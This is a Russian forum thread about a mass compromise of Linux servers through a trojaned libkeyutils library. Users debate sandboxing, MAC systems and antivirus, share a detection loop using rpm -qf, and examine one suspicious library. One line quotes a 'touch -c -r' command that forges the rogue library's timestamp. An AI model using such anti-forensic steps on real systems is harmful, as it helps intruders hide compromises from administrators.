> тут приложение какое-то обратилось к vlc чтобы что-то проиграл, тут папка,
> синхронизированная с дропбоксом... И т.д.
> Понимаете, сила современного (или уже не современного?) десктопа как раз в том,
> что приложения друг о друге знают и могут кооперироваться. И ломать
> это добровольно - глупо.у меня браузер от отдельного юзера и торент, настроил общую группу на чтение, а торент-файлы, например, переносятся-удаляются всё равно через торентокачалку
всё это достаточно решаемо, некоторые так вообще айтюнсом пользуются и нахваливают - им хватает
> ну так я только за если vlc будет иметь права на чтение-запись
> только в папку с видео-музыкой, а про ~/.mozilla/firefox/ чтоб вообще узнать
> не мог, даже если vlc из "официальных репов дистриба"Ну так вы в вашем праве засунуть его в контейнер с такими правами. Надо ли это по дефолту - вопрос интересный. А как узнать где у некоего пользователя видео лежит? Тем не менее, если кому зудит - есть прекрасные фильтры сисколов, позволяющие фильтровать системные вызовы и их параметры. Если паранойя долбит - юзайте.
Вот например чуваки http://codepad.org/ не боятся твой севый код запускать. А что, взломаешь перчиков? Тебе дадены все рули в лапы - можешь свой сплойт на сях заливать :)
> lrwxrwxrwx 1 root root 36 дек. 5 03:54 /libnss3.so ->
> /usr/lib/x86_64-linux-gnu/libnss3.so...
> установочные скрипты ИЗ левого ПАКЕТА запускаются с правами рута - это
> додуматься ж надо до такого....)Откуда из этой информации видно что оно пускается от рута? Отсюда видно лишь что owner'ом файла является рут. А вот это правильно - а чего-это какие-то левые субъекты будут в обход рута исполняемое файло в системе менять? Может быть, виндузоидам до того как истерически биться в конвульсиях надо бы немного RTFMать хотя-бы?
> Откуда из этой информации видно что оно пускается от рута? Отсюда видно
> лишь что owner'ом файла является рут.отсюда видно ?
ls -la /
drwxr-xr-x 1 root root 296 февр. 18 10:25 ./
drwxr-xr-x 1 root root 296 февр. 18 10:25 ../
кто у нас в корне мог создать ссылку кроме рута ?
> Защита одних программ от других хороша в теории, а на практике приносит
> столько неудобств, что в большинстве случаев много выгоднее терпеть весьма малый
> риск взлома.Назад, в будущ^wDOS?
Нет, всего лишь выбираем оптимум для каждого случая. Где-то - одна прошивка в одном адресном пространстве. Где-то - навороченная система доступов и привилегий, вплоть до виртуализации всего и вся, как в Cubes. А обычно доверия маинтайнерам и осторожности при подключения новых реп вполне хватает.
> тогда мы идём к вам[/offtop]"Иди сюда, слонёнок, мы дадим тебе тумаков" (ц)
>> тогда мы идём к вам[/offtop]
> "Иди сюда, слонёнок, мы дадим тебе тумаков" (ц)"всех не перевешаете!" (с)
> "всех не перевешаете!" (с)Оно и не надо - сами вымрете.
>>> тогда мы идём к вам[/offtop]
>> "Иди сюда, слонёнок, мы дадим тебе тумаков" (ц)
> "всех не перевешаете!" (с)" ..., но стремиться к этому нужно!"
> [offtop]
>>Среди атакованных система также отмечаются серверы с системой обновления ядра ksplice и серверы с sshd на нестандартном порту.
> а вы всё ещё считаете что ваши репозитории в безопасноти ? и
> вашему линуксу не нужна защита одних программ от других программ ?
> тогда мы идём к вам[/offtop]Привет, Жека. Что, опять продажи падают?
>> [offtop]
>>>Среди атакованных система также отмечаются серверы с системой обновления ядра ksplice и серверы с sshd на нестандартном порту.
>> а вы всё ещё считаете что ваши репозитории в безопасноти ? и
>> вашему линуксу не нужна защита одних программ от других программ ?
>> тогда мы идём к вам[/offtop]
> Привет, Жека. Что, опять продажи падают?если вы про антивирус - то вы меня спутали
зы: я не предлагаю антивирьё (по моему мнению оно бесполезно процентов на 75), скорее нужно жёсткое разграничение прав, запрет на исполнение идущего в комплекте с пакетом в глобальном окружении, контейнеры и виртуалки
>>> [offtop]
>>>>Среди атакованных система также отмечаются серверы с системой обновления ядра ksplice и серверы с sshd на нестандартном порту.
>>> а вы всё ещё считаете что ваши репозитории в безопасноти ? и
>>> вашему линуксу не нужна защита одних программ от других программ ?
>>> тогда мы идём к вам[/offtop]
>> Привет, Жека. Что, опять продажи падают?
> если вы про антивирус - то вы меня спутали
> зы: я не предлагаю антивирьё (по моему мнению оно бесполезно процентов на
> 75), скорее нужно жёсткое разграничение прав, запрет на исполнение идущего в
> комплекте с пакетом в глобальном окружении, контейнеры и виртуалкиТрындишь, косой. Наличие антивируса (что на клиенте - чего-то приличного, например, Симантек, что на сервере - тот же Clam) по статистике не от Фороникса и не от производителей снижает риск занесения хомячьем чего-то потенциально и кинетически опасного минимум вдвое. Имея, разумеется, в виду достаточно типовую не для РиК инфраструктуру (т.е. клиенты на винде, серверы на никсах).
> скорее нужно жёсткое разграничение прав, запрет на исполнение идущего в
> комплекте с пакетом в глобальном окружении, контейнеры и виртуалкиТак все это в лине есть. Тем не менее, даже раздолбаная виртуалка - это все-таки неприятно, так что разбор полетов проводить все-таки надо.
>> скорее нужно жёсткое разграничение прав, запрет на исполнение идущего в
>> комплекте с пакетом в глобальном окружении, контейнеры и виртуалки
> Так все это в лине есть. Тем не менее, даже раздолбаная виртуалка
> - это все-таки неприятно, так что разбор полетов проводить все-таки надо.а кто-то на луну говрят летал, а кто-то чемпион олимпии
хочется чтоб мантейнеры дистрибов помнили о таких проблемах и делали шаги в этом направлении а не прятали голову в песок как многие в этом тредезы: я сам не потяну быть мантейнером этого, мне бы со своим локалхостом разобраться бы, именно поэтому я хочу чтоб было на кого положится и чтоб ошибки мантейнеров не стали ошибками на моём локалхосте
> хочется чтоб мантейнеры дистрибов помнили о таких проблемах и делали шаги в
> этом направлении а не прятали голову в песок как многие в этом тредеКак бы это сказать? Чем стандартнее меры безопасности у лично вас на серваке, тем вероятнее что хаксоры будут в курсе их наличия и задумаются об их обходе "по умолчанию" в автоматических атаках. Стало быть, хороший админ должен по возможности добавить кастомных плюшек от себя. Чтобы повысить вероятность того что хаксор застрянет в любезно предоставленном ему капкане.
>> хочется чтоб мантейнеры дистрибов помнили о таких проблемах и делали шаги в
>> этом направлении а не прятали голову в песок как многие в этом треде
> Как бы это сказать? Чем стандартнее меры безопасности у лично вас на
> серваке, тем вероятнее что хаксоры будут в курсе их наличия и
> задумаются об их обходе "по умолчанию" в автоматических атаках. Стало быть,
> хороший админ должен по возможности добавить кастомных плюшек от себя. Чтобы
> повысить вероятность того что хаксор застрянет в любезно предоставленном ему капкане.если стандартные меры действенны то их надо внедрять повсеместно
хацкеры в курсе что от рута обычно не сидят и задумываются об обходе этого умолчания - но это же не повод сидеть под рутом !
так почему например по дефолту все пакеты должны иметь доступ к конфигам других пакетов в ~/.config/ ?
> если стандартные меры действенны то их надо внедрять повсеместно
>> если стандартные меры действенны то их надо внедрять повсеместно
> https://help.ubuntu.com/community/AppArmorвы предлагаете каждому хомячку самостоятельно настраивать профайлы ?
это примерно как выслать в школы диски с линуксом но он с них не устанавливается - а чего, юзеры сами с инета скачают и установятцитата меня любимого "хочется чтоб мантейнеры дистрибов помнили о таких проблемах и делали шаги в этом направлении а не прятали голову в песок как многие в этом треде" (с)
> вы предлагаете каждому хомячку самостоятельно настраивать профайлы ?Тем, кто не умеет читать - да. Предлагаю. Только они это не прочитают, и не узнают, что я им предлагаю.
> если стандартные меры действенны то их надо внедрять повсеместноТак внедряют. Если озадачиться вопросом и изучить его, окажется что ALSR, W^X, различные защиты стека и т.п. со стороны компилера и прочая - уже давно внедрены в более-менее цивильных дистрах.
> хацкеры в курсе что от рута обычно не сидят и задумываются об
> обходе этого умолчания - но это же не повод сидеть под рутом !И много вы линуксоидов видели которые в крейсерском режиме под рутом сидят? Линукс прекрасно юзабелен из-под лимитированного юзера. И как правило
> так почему например по дефолту все пакеты должны иметь доступ к конфигам
> других пакетов в ~/.config/ ?Потому что пакеты может вкатывать только рут (что логично - а чего это некто левый будет софт в системе тасовать?). Пакетный менеджер - программа с повышенными привилегиями. Она может совершать административные действия. Это зачастую попросту необходимо для установки пакетов.
И да, вы не должны инсталлировать недоверяемые программы. В том числе и через пакетный менеджер. Если вы не доверяете репозиторию - просто не используйте его. А если вы ставите недоверемую программу, она так или иначе может вас поиметь, заэнфорсив какую-то вредную или нежелательную для вас логику поведения. Как еще понятнее это объяснить - я не знаю. Если надо нечто заведомо проблемное - ну гоняйте его на виртуалочках, как это те же аверы делают, например. Желательно на отдельном изолированном хосте, на случай если пакость шибко борзая и каким-то чудом виртуализатор прошибет, мало ли, баги все-таки везде бывают.
> ALSR, W^X, различные защиты стека и т.п. со стороны компилера и прочая -
> уже давно внедрены в более-менее цивильных дистрах.это хорошо, но стоит двигаться дальше
> Линукс прекрасно юзабелен из-под лимитированного юзера. И как правило
о том и речь - так же удобно можно сделать чтоб отдельные программы сидели с раздельными правами на свой каталог настройки, на общее хранилише
>> так почему например по дефолту все пакеты должны иметь доступ к конфигам
>> других пакетов в ~/.config/ ?
> Потому что пакеты может вкатывать только рут (что логично - а чего
> это некто левый будет софт в системе тасовать?). Пакетный менеджер -
> программа с повышенными привилегиями. Она может совершать административные действия.
> Это зачастую попросту необходимо для установки пакетов.это нифига не логично, ни то что одни программы юзерского уровня имеют доступ к другим программам юзерского уровня
ни то что пакетный менеджер запускает скрипты из пакетов под собственным юзером (рутом !!)
распаковал, сделал загончик для пакета, сбросил права до юзер_пакетНейм - запустил скрипты с пакета - вот как логично> И да, вы не должны инсталлировать недоверяемые программы. В том числе и
> через пакетный менеджер. Если вы не доверяете репозиторию - просто не
> используйте его. А если вы ставите недоверемую программу, она так или
> иначе может вас поиметь, заэнфорсив какую-то вредную или нежелательную для вас
> логику поведения. Как еще понятнее это объяснить - я не знаю.
> Если надо нечто заведомо проблемное - ну гоняйте его на виртуалочках,
> как это те же аверы делают, например. Желательно на отдельном изолированном
> хосте, на случай если пакость шибко борзая и каким-то чудом виртуализатор
> прошибет, мало ли, баги все-таки везде бывают.ну вот - других то нет ! нет доверенного vlc (последней версии) для убунты ! и чем линукс лучше винды тут ? так же заставляет идти на варезник (ланчпад) и не даёт из коробки средств юзеру чувствовать себя сухо и комфортно при этом, скорее даже наоборот
при том что в винде уже давно есть инфраструктура "по правой кнопке мыши запустить из песочницы" и она оказывается более защищённой (как ни странно)
> И да, вы не должны инсталлировать недоверяемые программы.Рекомендация ничем не отличается от "не кликайте на фотки "Здесь голая Курникова"
Сразу возникает вопрос - преимущество то где ?
for LIB in /lib/libkeyutils* /lib64/libkeyutils*; do echo $LIB; rpm -qf $LIB; echo; done
В общем, это доказывает слова экспертов о несостоятельности утверждений об абсолютно надежной архитектуре, и о том, что незыблемая защищенность - просто проявление принципа "неуловимого Джо". Кстати говоря, повышение популярности платформы, кроме банального повышения интереса к ней хакеров (более тщательный поиск уязвимостей), способствует привлечению к написанию кода (системы и окружения) всё большего числа программистов, среди которых растет и число тех, в ком довольно слабо развита дисциплина качественного и надежного кодирования (возникновение большего числа уязвимостей).
Однако, системы с открытым исходным кодом, как правило, характеризуются максимально малым временем локализации и исправления критических ошибок и уязвимостей (поскольку открытый код позволяет вести параллельный анализ сразу большому числу независимых специалистов), так что брешь закроют очень скоро. В отличие от... :)
Да, теоретически, каждый разработчик может оказаться мудаком. Или microsoft может зарядить сотню разведчиков, чтобы они вели себя, как добропорядочные, но в нужный момент сделали бы какое-нибудь деяние для дискредитации и нового всплеска продаж windows server.Но для защиты от этого нужно искоренять не открытое и свободное ПО, а мудаков.
Кроме того, свободные ОС не заканчиваются на Linux. Там, где нужна безопасность - есть свои решения, свободные, с более строгим аудитом. Когда кто-то не умеет пользоваться выбором, надевает первое, что под руку попало, а потом говорит, что не подошло - это вопрос только к тем, кто доверил этому товарищу настраивать компьютеры, а не к операционной системе. Можно и пароль на root не задать, а потом плакать, что ломают.
Абсолютно надёжного ничего не бывает, но принципы свободного как раз защищают от многих типов проблем и закладок. А когда кто-то с упорством дворника тащит несвободно, плача и ругая всех вокруг, а потом удивляется, почему его не защитило свободное - ну что тут скажешь... К сожалению, очень много тех, кто не понимает даже самых базовых принципов, но мнение имеет. Тех, кто эти принципы понимает, ломают гораздо реже. :)
Позволю тебе процитировать самого тебя:> его не защитило свободное - ну что тут скажешь... К сожалению,
> очень много тех, кто не понимает даже самых базовых принципов, но
> мнение имеет.Ты о себе это написал. Поздравляю. Очень самокритично.
И тем не менее, он кое в чем прав.
1) Если вас поймают на бэкдоринге - это слив репутации на всю жизнь. Это достаточно высокая ставка и достаточно хороший стопор даже для горячих голов. Потому что добиться уважения в открытом сообществе требует неких усилий. И все проср@ть в 1 момент - достаточно обидная перспектива.
2) Таки были прецеденты попыток внедрения безобидно выглядящих бэкдоров замаскированных под опечатку в линуксовый кернел. И таки они были запалены. Так что такие тезисы подтверждаются и вполне конкретными прецедентами.
А по факту для энтерпрайз систему это фиаско, не иначе
> А по факту для энтерпрайз систему это фиаско, не иначеТогда Windows бы вообще не существовало ни в каком виде. :) После Code Red и MSBlast в любой другой отрасли уже давно сделали бы групповое самоубийство и покрылись миллиардными штрафами. А они за это ещё и деньги берут. :)
>> А по факту для энтерпрайз систему это фиаско, не иначе
> Тогда Windows бы вообще не существовало ни в каком виде. :) После
> Code Red и MSBlast в любой другой отрасли уже давно сделали
> бы групповое самоубийство и покрылись миллиардными штрафами. А они за это
> ещё и деньги берут. :)Почему мэнтайнеры массово не сыплются из окон, расскажи? И где мертвый Линус? Еще тогда, после слома Кернел.орг?
> Почему мэнтайнеры массово не сыплются из окон, расскажи? И где мертвый Линус?
> Еще тогда, после слома Кернел.орг?Кому был приченён ущерб? Имена, фамилии, явки.
А msblast, по-моему, до сих пор можно словить в диком виде, если просто установить систему без сервис-паков и вывести в интернет :)
> Еще тогда, после слома Кернел.орг?Кернелорг ломанула какая-то автоматическая фигня, ворующая ключи ssh. Так вот просто и банально. Подобная же фигня ломанула у фрибздельников серваки.
>>> А по факту для энтерпрайз систему это фиаско, не иначе
>> Тогда Windows бы вообще не существовало ни в каком виде. :) После
>> Code Red и MSBlast в любой другой отрасли уже давно сделали
>> бы групповое самоубийство и покрылись миллиардными штрафами. А они за это
>> ещё и деньги берут. :)
> Почему мэнтайнеры массово не сыплются из окон, расскажи? И где мертвый Линус?
> Еще тогда, после слома Кернел.орг?потому что непатченый линукс встречается так же часто, как и непатченая винда. некоторые этим еще и гордятся, хвастаются у кого аптайм длиннее.
> потому что непатченый линукс встречается так же часто, как и непатченая винда.
> некоторые этим еще и гордятся, хвастаются у кого аптайм длиннее."По плодам их узнаете их". Говорить можно всё, что угодно, но где реальные проблемы, посадки, уязвимости? Весь интернет держится на linux и подобных свободных ОС, где хаос и разрушения?
>> потому что непатченый линукс встречается так же часто, как и непатченая винда.
>> некоторые этим еще и гордятся, хвастаются у кого аптайм длиннее.
> "По плодам их узнаете их". Говорить можно всё, что угодно, но где
> реальные проблемы, посадки, уязвимости? Весь интернет держится на linux и подобных
> свободных ОС, где хаос и разрушения?Интернет, батенька, появился задолго до того, как линукс вырос из коротких штанишек. Учите историю - за умного сойдете.
> Интернет, батенька, появился задолго до того, как линукс вырос из коротких штанишек.
> Учите историю - за умного сойдете.А Волга впадает в Каспийское море.
Разумеется, что вы можете сделать с ответом, который напрочь опровергает все ваши теории о безопасности и небезопасности? Только покривляться.
> "По плодам их узнаете их". Говорить можно всё, что угодно, но где
> реальные проблемы, посадки, уязвимости? Весь интернет держится на linux и подобных
> свободных ОС, где хаос и разрушения?вы отвечаете явно не на мой камент. я чо-та не помню, чтобы я говорил о хаосе и разрушениях. я говорил о непатченых системах.
> вы отвечаете явно не на мой камент. я чо-та не помню, чтобы
> я говорил о хаосе и разрушениях. я говорил о непатченых системах.Что значит "непатченная система"? В ядре вообще уязвимости редки, остальное обновляется "на лету". Поэтому проблем с длинными аптаймами нет, разрушений от этих аптаймов нет, а сравнение аптаймами с виндой, где на каждый чих перезагрузка требуется, вообще некорректно.
Тем более, есть ksplice. Поэтому маленький аптайм - это проблема, и срочно к доктору! Или джип.
> Что значит "непатченная система"? В ядре вообще уязвимости редки, остальное обновляется
> "на лету". Поэтому проблем с длинными аптаймами нет, разрушений от этих
> аптаймов нет, а сравнение аптаймами с виндой, где на каждый чих
> перезагрузка требуется, вообще некорректно.на всякий случай повторю здесь мой исходный камент, чтобы читатели этого милого тредика оценили, с какой скоростью галлюцинирует мой собеседник:
"непатченый линукс встречается так же часто, как и непатченая винда. некоторые этим еще и гордятся, хвастаются у кого аптайм длиннее. "
договорите с голосами в вашей голове - не забудьте принять вещества.
> на всякий случай повторю здесь мой исходный каментА вот и откровенное враньё пошло. Исходный коммент был про репутацию систем, и количество глобальных и серъёзных уязвимостей.
Только не надо говорить, что когда писался комментарий про "непатченный linux", автор думал о бабах а не держался контекста разговора.
В результате было по полочкам разложено, что аптайм linux этому всему не помеха (в отличие, кстати, от винды). Но тут у Митрюхи пошли дежурные видения, и он окончательно ушёл от нас в свой сверкающий мир.
как вы уже все надоели. какая сила тянет и тянет вас в интернет самоутверждаться за счёт других людей? Почему вас не научили нормально общаться? Или тоже боитесь, что за доброе слово вас в юноши-мечтатели запишут, а быть прожжёным мудаком это так круто, и в случае чего можно всё свести к одному. Это страх, это та самая социопатия, о которой вещали процентные большевики.
Их довольно быстро закрыли. У тех кто денежку платил проблем практически не было.
Интересно, а с SElinux оно тоже работает?
А вот это действительно интересный вопрос.
> Интересно, а с SElinux оно тоже работает?Зависит от типа атаки и того, на что она была направлена. Если на низкоуровневую фигню, то вряд ли SElinux спасёт. Хотя, при правильной настройке... В общем, на серверах какой-нибудь MAC держать надо в обязательном порядке, для дополнительной защиты.
> на низкоуровневую фигню, то вряд ли SElinux спасёт.В случае атак на низкоуровневую фигню его первым делом и отключают в соотв. сплойте. Как по мне - с ним слишком дофига возни при не слишком значительном результате. Проще пилить все на контейнеры+виртуалки, имхо. И изоляция еще более злобная, и возни с ее настройкой в разы меньше. Поднять новый контейнер в разы проще чем политики SELinux редактировать.
root@gw:~# ls -la /lib64/libkeyutils.so.1.9
-rw-r--r-- 1 root root 9879 Фев 21 2013 /lib64/libkeyutils.so.1.9
root@gw:~# rpm -qf /lib64/libkeyutils.so.1.9
bash: rpm: команда не найдена
root@gw:~# cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04"
и что мне теперь делать!???
> root@gw:~# ls -la /lib64/libkeyutils.so.1.9
> -rw-r--r-- 1 root root 9879 Фев 21 2013 /lib64/libkeyutils.so.1.9
> root@gw:~# rpm -qf /lib64/libkeyutils.so.1.9
> bash: rpm: команда не найдена
> root@gw:~# cat /etc/lsb-release
> DISTRIB_ID=Ubuntu
> DISTRIB_RELEASE=12.04
> DISTRIB_CODENAME=precise
> DISTRIB_DESCRIPTION="Ubuntu 12.04"
> и что мне теперь делать!???Черт, друг, держись. Я тоже не знаю, что нам делать.
Но сейчас чуваки набегут, они нам помогут.
> root@gw:~# ls -la /lib64/libkeyutils.so.1.9
> -rw-r--r-- 1 root root 9879 Фев 21 2013 /lib64/libkeyutils.so.1.9Оригинально.
ps. dpkg -S libkeyutlis.so.1.9
> root@gw:~# cat /etc/lsb-release
> DISTRIB_ID=Ubuntu
> DISTRIB_RELEASE=12.04
> DISTRIB_CODENAME=precise
> DISTRIB_DESCRIPTION="Ubuntu 12.04"
> и что мне теперь делать!???Рассказать о том, какой софт установлен.
Похоже его всё-таки поломали.http://packages.ubuntu.com/search?suite=precise&arch=any&mod...
Тут говорят, что последняя версия этой либы - 1.4. Соответственно 1.9 там быть не может.
Дата "21 февраля 2013" говорит, что все там будем :(
> Дата "21 февраля 2013" говорит, что все там будем :(Кто-то увёл машину времени?
Да на вброс это похоже.
Ибо при установке время изменения файла меняется на то же что и libkeyutils.so.1.4
> Тут говорят, что последняя версия этой либы - 1.4. Соответственно 1.9 там
> быть не может.Совершенно верно, в 12.04 LTS — 1.4. И у меня 1.4.
Обнови репы, и переустанови keyutils
> root@gw:~# ls -la /lib64/libkeyutils.so.1.9
> -rw-r--r-- 1 root root 9879 Фев 21 2013 /lib64/libkeyutils.so.1.9
> root@gw:~# rpm -qf /lib64/libkeyutils.so.1.9
> bash: rpm: команда не найдена
> root@gw:~# cat /etc/lsb-release
> DISTRIB_ID=Ubuntu
> DISTRIB_RELEASE=12.04
> DISTRIB_CODENAME=precise
> DISTRIB_DESCRIPTION="Ubuntu 12.04"
> и что мне теперь делать!???багрепорт пиши
touch -c -r libkeyutils-1.2.so libkeyutils.so.1.9
вот эта командочка у тебя не отработала.
Вот тут *нормальный* secure boot бы и пригодился. Подписал своим ключиком все бинарники - и хоть обвзламывайся, железо ничего чужого не запустит.
> Вот тут *нормальный* secure boot бы и пригодился. Подписал своим ключиком все
> бинарники - и хоть обвзламывайся, железо ничего чужого не запустит.apparmor, например. или та штука, которую недавно в ядро добавили, забыл название.
А еще лучше - Hardened Gentoo + PaX + grsecurity + SElinux c правильными настройками, и рутовым доступом только через KVM.
> А еще лучше - Hardened Gentoo + PaX + grsecurity + SElinuxХех, а ты п...ый аналитег :) - bluness grsecurity + SElinux не умеет, Swift grsecurity + SElinux , solar и PeBenito тоже не умеют, Wolsh kak то даже не понял как оно может работать - зато анонимный аналитег на великолепном опеннете всегда готов пернуть в лужу, рассказывая всем , что результат сложения 2+2 достигает 6
Это Anthony Basile то не умеет? Ну-ну. Вы бы еще spender-а упомянули. Кроме того, я имел ввиду не grsecurity RBAC, а все остальное, а RBAC от SELinux.
> Это Anthony Basile то не умеет? Ну-ну. Вы бы еще spender-а упомянули.
> Кроме того, я имел ввиду не grsecurity RBAC, а все остальное,
> а RBAC от SELinux.не grsecurity RBAC - a ты еще тупее, чем я думал :) PAX путать с грсек'ом ;)
Так шта на опеннете тебе пока что самое место
> Так шта на опеннете тебе пока что самое местоА вы что тут делаете с таким ЧСВ? Или вы хотели сказать что вы и сами ничем не лучше? Ну ок, засчитано :)
>> Так шта на опеннете тебе пока что самое место
> А вы что тут делаете с таким ЧСВ? Или вы хотели сказать
> что вы и сами ничем не лучше? Ну ок, засчитано :)Чешу ;)
Никто и не путает. Патчи от grsecurity это не только PaX и RBAC.
> Никто и не путает. Патчи от grsecurity это не только PaX и
> RBAC.Ну ок, давай предметно - что еще ?
> Это Anthony Basile то не умеет? Ну-ну. Вы бы еще spender-аKomy Anthony Basile , a koму можно и просто Tony.
> Ну-ну. Вы бы еще spender-аК сожалению, не общался и не знаком.
Ага. Неделю потратишь на настройку. А потом у админа на непропатченной XP ключи сопрут.
Да-да. лечить следствие, а не причину - это же так модно.
sh mycode.sh - или perl, или python, или ещё что... Вариантов хватит. Суть, в общем-то, в том, что "достаточно безопасная" система попросту неудобна в работе.
лол, если уязвимость в ядре, то ты будешь сам молится пока его не подпишут
> и хоть обвзламывайся, железо ничего чужого не запустит.Зависит от. Как бы эксплойты зачастую не имеют инкарнации в виде бинарника на диске и являются лишь кусочком хакерского кода в памяти, удачно вброшенным и запущенным при атаке. При этом глубоко похрен какой там у кого secure boot, поскольку этот кусок патчит лишь in-memory барахло. Уже после верификации. А криптографически верифицировать вообще каждое обращение к памяти - дико накладно по скорости, однако.
Другое дело что вписаться в загрузку на постоянной основе руткиту после этого станет намного проблематичнее. Если у него конечно была такая цель.
В Челябинске упал метеорит, массовый взлом серверов на базе Linux... Неплохо так год начинается... Насыщенно.
> В Челябинске упал метеорит, массовый взлом серверов на базе Linux... Неплохо так
> год начинается... Насыщенно.Инопланетный разум с метеорита ломанул все сервера на базе Linux :-)
> Инопланетный разум с метеорита ломанул все сервера на базе Linux :-)Судя по всему - таки не все. У себя такого не вижу.
Разговор ни о чем. Наличие панелей говорит о том, что владельцы - вендузятники. Вполне могли потерять пароли от своих любимых winscp и putty.exe.http://vms.drweb.com/virus/?i=2301243
http://news.drweb.com/?i=3280&c=5&lng=ru&p=0>Также в январе был зафиксирован факт распространения новой модификации давно известной вредоносной программы семейства BackDoor.Butirat — BackDoor.Butirat.245. Данный троянец способен загружать на инфицированный компьютер и запускать на нем исполняемые файлы по команде с управляющего сервера, а также красть пароли от популярных FTP-клиентов.
> Наличие панелей говорит о том, что владельцы -
> дешевые говнохостеры.я поправил. не благодари, бро.
> Вполне могли потерять пароли от своих любимых winscp и putty.exe.Не пароли а просто привкеи для логина на серванты.
> Наличие панелей говорит о том, что владельцы - вендузятники.Сколько презрения и пафоса одновременно. 13 лет уже исполнилось?
ну, вообще-то довольно вероятный вариант
> ну, вообще-то довольно вероятный вариантЧто 13 лет исполнилось? :) ОК, возможно, комментатору даже 15. Отчаянное минусование косвенно подверждает малолетний баттхёрт :)
Это всё детский сад из серии "кде для конфигурастов", "гном для идиотов" и т.д. Берём что-то, что не нравится, и делаем вид, что это атрибут кого-то, кто не нравится. Как раз уровень средней школы.
> Что 13 лет исполнилось? :) ОК, возможно, комментатору даже 15. Отчаянное минусование
> косвенно подверждает малолетний баттхёрт :)
> Это всё детский сад из серии "кде для конфигурастов", "гном для идиотов"
> и т.д. Берём что-то, что не нравится, и делаем вид, что
> это атрибут кого-то, кто не нравится. Как раз уровень средней школы.У меня другое наблюдение. Что те, кто всё сводят к возрасту, явно имеют какой-то комплекс на этой почве. И, когда они наконец-то ДОРОСЛИ, начинают на правах старых попрекать возрастом других.
Не вижу особо, как возраст бы коррелировал с нормальным общением.
> Не вижу особо, как возраст бы коррелировал с нормальным общением.Я не про биологический возраст, а про психологический. Можно дожить до полтинника и продолжать рассуждать как школоло с юношеским максимализмом. И это очень печально.
> Я не про биологический возраст, а про психологический.А причём здесь тогда "13 лет"?
> Можно дожить до полтинника и продолжать рассуждать как школоло с юношеским максимализмом. И это очень печально.А можно строить из себя рассудительного и правильного, но прокалываться на каждой мелочи. Когда у человека есть мнение - это гораздо полезнее, чем когда он повторяет только то, что принято.
Юношеский максимализм обычно вылетает с выбитыми зубами и с осознанием невозможности что-то сделать. Только вся наша жизнь - это достижения тех, кто не мирился с какой-то там невозможностью. :) Иначе говоря, страх "а вдруг моё мнение не поймут, буду поспокойнее" - это защитная реакция, это не значит, что индивидуум перестал так думать, это обычно значит, что индивидуум стал говорить "как тут заведено", чтобы его каждый первый не тыкал в лицо со своим "школьником".
И в результате любая тема превращается в занудное одинаковое непродуктивное нытьё. Зато все такие взрослые и умные, что банально поговорить, нормально поговорить не с кем. И сообщества никакого нет, потому что все по углам сидят и взрослость берегут.
У Чуковского есть гениальная, на мой взгляд, книжка "От двух до пяти". И чем больше я смотрел на своих детей в промежутке от двух до пяти, тем больше видел, чему мы у них можем научиться.
>> Я не про биологический возраст, а про психологический.
> А причём здесь тогда "13 лет"?Это же классика, ну :)
> Когда у человека есть мнение - это гораздо полезнее, чем
> когда он повторяет только то, что принято.Не надо оправдывать идиотизм относительностью. Иначе мы так договоримся до того, что воровство лучше убийства.
> И в результате любая тема превращается в занудное одинаковое непродуктивное нытьё.
Именно максималистские лозунги и делают обсуждения непродуктивными. Обсуждаемый нами комментатор не высказал не то что ни одной оригинальной идеи, он даже неоригинальную идею изуродовал до неузнаваемости. Попробуйте на досуге логически связать панели управления и потерю пароля от winscp. Зато в комменте был лозунг. А лозунг заменяет логику, ага.
>> Когда у человека есть мнение - это гораздо полезнее, чем
>> когда он повторяет только то, что принято.
> Не надо оправдывать идиотизм относительностью. Иначе мы так договоримся до того, что
> воровство лучше убийства.Как будто до этого тут был абсолютный порядок, и один комментатор всё нарушил. Тут сплошные воровства и убийства. И уж лучше в этом хаосе будут робин-гуды, чем банальное мочилово и воровалово.
>> И в результате любая тема превращается в занудное одинаковое непродуктивное нытьё.
> Именно максималистские лозунги и делают обсуждения непродуктивными.Иногда это ирония, иногда это констатация печальной действительности. Сами по себе они ничего страшного не несут, мешает только их перебор. И перебор мешает во всём, даже самое остроумное замечание при 55-м повторении теряет всю прелесть.
Не буду судить пост автора, но про панели я на опеннете точно слышал реже, чем 55 раз.
> Обсуждаемый нами комментатор не высказал не то что ни одной оригинальной идеи, он
> даже неоригинальную идею изуродовал до неузнаваемости. Попробуйте на досуге логически
> связать панели управления и потерю пароля от winscp.Легко. Когда кто-то хочет связать мощь linux и старые привычки покорителя бездумных стрелялок и бухгалтерий, он соединяется с сервером через win-клиент из привычного windows, и может смело запустить какой-то установщик с проприетарным приложением, не делающий ничего понятного, и перезаписывающий файлы. Скорее всего, он с такой же безалаберностью относится и к собственной безопасностью. Это просто мечта для хакера - бесплатный пароль на linux.
Другие категории попадают под это с мизерной вероятностью: тот, у кого пароли не умыкнёшь, тот скорее всего не будет пользоваться панелями. У кого нет никаких linux-серверов, тот тоже не будет пользоваться панелями, как и ssh-клиентами.
Поэтому ответ на головоломку такой: виноват пользователь Windows. Обычно именно у него воруют пароли на ssh. И обычно именно он ставит боекомплект "centos + панель". Это когда сознание "нужен linux" уже проснулось, а осознание "linux - это что?" - ещё нет.
> Зато в комменте был лозунг. А лозунг заменяет логику, ага.Если вы хотите привести к порядку, то вы не с того начинаете. Если вам просто что-то не нравится, то вы не решили ни одной проблемы.
Решают не тексты, слова, лозунги. Решает заложенный в них смысл, идея, её уместность. Только причём здесь молодость и опыт? Никто не может привести опеннет к порядку, никто не может придать сообществу подобие сообщества, а посему тут большинство себя будут так вести, потому что тут так заведено. Даже я не устоял... :) воздух тут такой, погода благоприятствовала любви, наверное... :)
Я понимаю Ваше желание многословно и витиевато изливать мысли, но давайте вернёмся на бренную землю.Есть хостинг, которым надо рулить. Есть панель, которая автоматизирует решение этой задачи.
Какое к этому отношение имеет операционная система у пользователя, которые периодически лазит в панель, будь он сотрудником хостера или же клиентом?
Вот эту логическую цепочку постройте. Больше ничего не надо.
что ломали через винду. Хотя против, конечно, то, что вроде только redhat-based системы. А так - сколько раз такое уже было...
> что ломали через винду. Хотя против, конечно, то, что вроде только redhat-based
> системы. А так - сколько раз такое уже было...Мне кажется, что в данном случае надо просто подождать, пока не разберутся и не найдут уязвимость, и уже потом делать выводы.
вообще да, но иногда хочется попророчить :-)
